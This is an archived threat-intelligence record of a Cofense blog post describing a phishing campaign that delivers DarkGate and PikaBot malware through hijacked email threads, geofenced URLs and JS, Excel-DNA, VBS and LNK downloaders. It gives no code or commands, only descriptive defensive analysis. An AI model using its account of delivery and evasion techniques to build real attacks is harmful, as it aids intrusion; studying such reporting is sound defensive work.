{
	"id": "9ddf5bb2-1166-4e56-baa8-9230ee6b1d1c",
	"created_at": "2026-04-06T00:09:00.752823Z",
	"updated_at": "2026-04-10T03:21:43.235925Z",
	"deleted_at": null,
	"sha1_hash": "cdc9f86abfcd6a049217aa4cff65a9bd4a062d32",
	"title": "Are DarkGate and PikaBot the new QakBot?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 323292,
	"plain_text": "Are DarkGate and PikaBot the new QakBot?\r\nArchived: 2026-04-05 13:25:46 UTC\r\nBy Dylan Duncan\r\nA malware phishing campaign that began spreading DarkGate malware in September of this year has evolved to\r\nbecome one of the most advanced phishing campaigns active in the threat landscape. Since then, the campaign has\r\nchanged to use evasive tactics and anti-analysis techniques to continue distributing DarkGate, and more recently,\r\nPikaBot. \r\nThe campaign surged just one month after the last seen QakBot activity, and follows the same trends used by the\r\ninfamous threat actors that deploy the QakBot malware and botnet. This campaign disseminates a high volume of\r\nemails to a wide range of industries, and due to the loader capabilities of the malware delivered, targets can be at\r\nrisk of more sophisticated threats like reconnaissance malware and ransomware.\r\nIn August of this year, the FBI and the Justice Department announced that they had disabled the QakBot\r\ninfrastructure. Since then, QakBot has remained silent, with no significant activity seen from the malware\r\ninfrastructure. While direct attribution between the QakBot threat actors and this campaign can be difficult, we\r\ncan show the similarities between the two. \r\nStarting with the timeline of the campaign, Cofense Intelligence last reported on QakBot towards the end of June\r\nwhereas DarkGate reports first emerged during July. The new campaign that is delivering DarkGate and PikaBot\r\nfollows the same tactics that have been used in QakBot phishing campaigns. These include hijacked email threads\r\nas the initial infection, URLs with unique patterns that limit user access, and an infection chain nearly identical to\r\nwhat we have seen with QakBot delivery. \r\nThe malware families used also follow suit to what we would expect QakBot affiliates to use. Along with many\r\nother capabilities, both malware families can act as loaders with the ability to add additional malicious payloads to\r\nunknown infected machines.\r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 1 of 6\n\nFigure 1: Timeline of QakBot and DarkGate/PikaBot Campaign based on Cofense Intelligence Sightings. \r\nInside Look at the Phishing Campaign\r\nThis campaign is undoubtedly a high-level threat due to the tactics, techniques, and procedures (TTPs) that enable\r\nthe phishing emails to reach intended targets as well as the advanced capabilities of the malware being delivered.\r\nDuring the lifespan of the campaign, we have noticed several different infection chains, almost as if the threat\r\nactors were testing different malware delivery options. \r\nHowever, a favored infection chain to deliver the malware has been made apparent and is illustrated in Figure 2.\r\nThis infection chain follows in line with that seen in QakBot campaigns during May of this year (Active Threat\r\nReports (ATRs): 325113, 324360, 323510).  \r\nThe campaign begins with a hijacked email thread to bait users into interacting with a URL that has added layers\r\nthat limit access to the malicious payload only to users that meet specific requirements set by the threat actors\r\n(location and internet browser). This URL downloads a ZIP archive that contains a JS file that is a JS Dropper,\r\nwhich is a JavaScript application used to reach out to another URL to download and run malware. At this stage, a\r\nuser has been successfully infected with either the DarkGate or PikaBot malware. \r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 2 of 6\n\nFigure 2: Most common infection chain used in the campaign. \r\nDarkGate and PikaBot are both considered advanced malware with loader capabilities and anti-analysis behavior.\r\nThis is attributed to the advanced features that each family offers and the steps within each malware config that\r\nmake analysis more complex for malware researchers. \r\nMost notable, and what would be the most appealing to threat actors like the QakBot affiliates, is that both\r\nmalware families can deliver additional payloads once successfully planted on a user’s machine. \r\nA successful DarkGate or PikaBot infection could lead to the delivery of advanced crypto mining software,\r\nreconnaissance tools, ransomware, or any other malicious file the threat actors wish to install on a victim’s\r\nmachine. More details on the individual families can be found below: \r\nDarkGate was first seen in 2018 and is capable of cryptocurrency mining, credential theft, ransomware,\r\nand remote access. The capabilities outlined do not come default installed but must instead be executed\r\nsimilarly to plugins. It has multiple methods of avoiding detection and two distinct methods of escalating\r\nprivileges. DarkGate makes use of legitimate AutoIT files and typically runs multiple AutoIT scripts.\r\nPikaBot is a new malware family first seen in 2023. It is classified as a loader due to its ability to deliver\r\nadditional malware payloads. It contains several evasive techniques to avoid sandboxes, virtual machines,\r\nand other debugging techniques. It has been observed to exclude infecting machines in CIS\r\n(Commonwealth of Independent States) countries. These countries were all members of the former Soviet\r\nUnion. \r\nEvasive Phishing Tactics Combined with Anti-analysis Techniques \r\nThis campaign combines well-known evasive phishing tactics with techniques known to disrupt malware analysis\r\nprocesses. The first steps of this campaign are far more complicated than the average phishing attack. The threat\r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 3 of 6\n\nactors disseminate the phishing emails through hijacked email threads that may be obtained from Microsoft\r\nProxyLogon attacks (CVE-2021-26855). This is a vulnerability on the Microsoft Exchange Server that allows\r\nthreat actors to bypass authentication and impersonate admins. \r\nResponding to email threads creates an added layer of trust between the threat actors and the target, since the\r\ntarget may recognize the conversation and believe the sender to be trusted. Figure 3 (ATR 351964) below is a real\r\nphishing example that reached an enterprise user’s inbox. The threat actors provided a message relevant to the\r\nhijacked thread to the target with the inclusion of a malicious link. This is one of the many factors that give\r\ncampaigns that utilize this tactic a higher chance of success. \r\nFigure 3: Real hijacked email thread example that delivered PikaBot (ATR 351964).\r\nIn the email, you can see the malicious URL shown in Figure 4. This URL contains a unique pattern like that seen\r\nin QakBot phishing campaigns (ATR 325113). These URLs are more than your average phishing URL; threat\r\nactors have included added layers to limit access to the malicious file that it delivers. For example, to retrieve the\r\ndownload users must be using Google Chrome browser in a specific location set by the threat actors, specifically\r\nin the United States. \r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 4 of 6\n\nFigure 4: Phishing URL used to download and run malicious JS Dropper. \r\nExperimenting with Malware Delivery Options \r\nThe most common delivery mechanism seen in this campaign is JS Droppers, however, Cofense Intelligence has\r\nbeen tracking this campaign since the beginning and has documented each infection chain utilized in this\r\ncampaign. The most notable, outside of the JS Droppers, include the use of Excel-DNA Loader, VBS\r\nDownloaders, and LNK Downloaders. \r\nThreat actors use these methods for downloading and installing their malware every day so it’s not uncommon to\r\nsee a campaign this advanced incorporate these additional methods within the infection chains. The most unusual\r\nmethod would be the incorporation of the Excel-DNA Loaders. This is a relatively new delivery mechanism (first\r\nseen in 2021) that became very popular early on and incorporates the use of Microsoft Excel add-ins to download\r\nand run malicious payloads. \r\nJavaScript Dropper (JS Dropper) is a script application written using a Microsoft ECMAScript dialect\r\nknown as Jscript, commonly referred to as JavaScript. These files can be identified by the file extension JS\r\nand can allow threat actors to create a malware delivery tool that is both natively executable on the\r\nWindows platform and highly malleable and adaptable. In most cases, these files are used to download,\r\nwrite to disk, and run a Windows PE executable or DLL payload.\r\nExcel-DNA Loader (Excel DotNET for Applications) is an open-source project that is used for creating\r\nXLL files as add-ins for Microsoft Excel. An XLL file is a Microsoft Excel add-in that can have many\r\nlegitimate workplace uses, but threat actors have taken these add-ins and configured their files to reach out\r\nto payload locations to download and run malicious payloads. This method of delivering malware was first\r\nobserved in 2021 delivering a wide range of malware, most notable was the Dridex banking trojan.\r\nVBS Downloaders leverage Visual Basic runtime applications, usually available within Windows\r\nenvironments, to carry out the download and execution of malware binaries. These scripts use the file\r\nextension VBS and run through Microsoft Office products or invoke Windows executable applications, like\r\ncscript.exe or wscript.exe, from the command line.\r\nLNK Downloader is a Microsoft LNK shortcut downloader that abuses the trusted nature of being a “safe”\r\nfile format to secure entry to a victim’s computer before downloading and executing a malware payload.\r\nThese files, known by the LNK extension, play the role of a file shortcut in Windows Explorer. However,\r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 5 of 6\n\nthreat actors have repurposed them to make a reference to their own content in such a way that allows\r\nexecutable script elements to run within the Windows environment. \r\nThis campaign is advanced, well-crafted, and has already evolved since it was first seen in the wild. The threat\r\nactors behind the campaign maintain skills beyond the average phisher, and employees should be aware that this\r\ntype of threat exists. Cofense Intelligence will continue to monitor the changes and the strong similarities to\r\nQakBot that this campaign exhibits.\r\nSource: https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/"
	],
	"report_names": [
		"are-darkgate-and-pikabot-the-new-qakbot"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434140,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cdc9f86abfcd6a049217aa4cff65a9bd4a062d32.pdf",
		"text": "https://archive.orkl.eu/cdc9f86abfcd6a049217aa4cff65a9bd4a062d32.txt",
		"img": "https://archive.orkl.eu/cdc9f86abfcd6a049217aa4cff65a9bd4a062d32.jpg"
	}
}